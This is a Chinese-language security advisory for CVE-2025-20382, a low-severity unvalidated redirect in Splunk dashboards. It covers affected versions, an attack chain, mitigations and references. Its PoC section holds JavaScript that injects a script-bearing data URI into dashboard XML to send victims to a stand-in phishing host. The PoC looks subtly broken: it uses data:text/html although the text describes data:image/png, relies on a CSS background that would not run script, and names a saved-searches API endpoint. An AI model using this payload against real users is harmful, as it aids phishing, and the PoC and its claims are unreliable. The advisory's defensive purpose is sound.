CVE-2025-20382: Splunk Enterprise/Cloud Platform 未验证URL重定向漏洞

漏洞信息

漏洞编号

CVE-2025-20382

漏洞类型

未验证URL重定向

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Splunk Enterprise, Splunk Cloud Platform

漏洞概述

CVE-2025-20382是Splunk Enterprise和Splunk Cloud Platform中的一个未验证URL重定向漏洞。该漏洞允许低权限用户（不持有admin或power角色）在创建视图仪表板时，使用data:image/png;base64协议设置自定义背景，从而绕过Splunk的外部URL警告机制。攻击者可以构造恶意链接，将受害者重定向到外部钓鱼网站。由于Splunk的安全机制被绕过，用户可能在不知情的情况下访问恶意站点，导致凭据泄露或其他安全问题。此漏洞需要用户交互，攻击者必须通过钓鱼手段诱骗受害者点击恶意链接。CVSS评分为3.5，属于低危漏洞。

技术细节

该漏洞存在于Splunk Enterprise 10.0.2之前版本、9.4.6之前版本、9.3.8之前版本、9.2.10之前版本，以及Splunk Cloud Platform 10.1.2507.10之前版本、10.0.2503.8之前版本、9.3.2411.120之前版本。攻击原理如下：1) 低权限用户创建一个新的视图仪表板（Views Dashboard）；2) 在仪表板设置中，使用data:image/png;base64协议注入精心构造的Base64编码数据；3) Splunk的外部URL警告机制仅检测传统http/https URL，无法识别data:image协议；4) 当受害者访问该仪表板并点击相关元素时，浏览器会解析data:image内容并触发重定向；5) 最终将用户重定向到攻击者控制的恶意站点。整个攻击过程利用了Splunk安全机制对特殊协议的检测盲区，实现了钓鱼攻击的目的。

攻击链分析

STEP 1

步骤1

攻击者获取低权限Splunk账户（无需admin或power角色）

STEP 2

步骤2

攻击者创建新的Views Dashboard或编辑现有仪表板

STEP 3

步骤3

在仪表板背景设置中注入data:image/png;base64协议的恶意载荷

STEP 4

步骤4

利用Splunk外部URL警告机制的检测盲区，绕过安全提示

STEP 5

步骤5

通过钓鱼邮件或社工手段诱骗受害者访问恶意仪表板链接

STEP 6

步骤6

受害者点击仪表板上的元素，触发data:image解析和重定向

STEP 7

步骤7

受害者浏览器被重定向至攻击者控制的钓鱼站点，窃取凭据或执行恶意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-20382 PoC - Splunk Unvalidated Redirect via data:image/png;base64
// This PoC demonstrates how an attacker can bypass Splunk's external URL warning

// Step 1: Create a malicious data URI with embedded redirect
const maliciousDataUri = 'data:text/html;base64,' + btoa(`
<html>
<body>
<script>
  // Redirect to attacker-controlled site
  window.location.href = 'https://attacker.example.com/phishing';
</script>
</body>
</html>
`);

// Step 2: Construct the dashboard XML with malicious background
const dashboardXml = `
<dashboard>
  <label>Malicious Dashboard</label>
  <row>
    <panel>
      <html>
        <div style="background-image: url('${maliciousDataUri}')">
          <h1>Click here for more info</h1>
        </div>
      </html>
    </panel>
  </row>
</dashboard>
`;

// Step 3: Upload the malicious dashboard via Splunk API
// POST to /servicesNS/nobody/search/saved/searches
const splunkApiUrl = 'https://target-splunk.com:8089/servicesNS/{user}/{app}/saved/searches';

// Note: Attacker must have low-privilege Splunk account
// Target user must interact (click) to trigger redirect

影响范围

Splunk Enterprise < 9.2.10

Splunk Enterprise < 9.3.8

Splunk Enterprise < 9.4.6

Splunk Enterprise < 10.0.2

Splunk Cloud Platform < 9.3.2411.120

Splunk Cloud Platform < 10.0.2503.8

Splunk Cloud Platform < 10.1.2507.10

防御指南

临时缓解措施

立即将Splunk Enterprise升级至9.2.10、9.3.8、9.4.6或10.0.2及更高版本，Splunk Cloud Platform升级至9.3.2411.120、10.0.2503.8或10.1.2507.10及更高版本。在等待补丁期间，管理员应审查并限制低权限用户创建自定义仪表板的能力，启用URL点击警告机制，并对所有外部链接保持警惕。建议通过Splunk官方渠道获取最新安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-20382
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-20382
3 Details https://www.cvedetails.com/cve/CVE-2025-20382/
4 VulDB https://vuldb.com/cve/CVE-2025-20382
5 Link https://advisory.splunk.com/advisories/SVD-2025-1201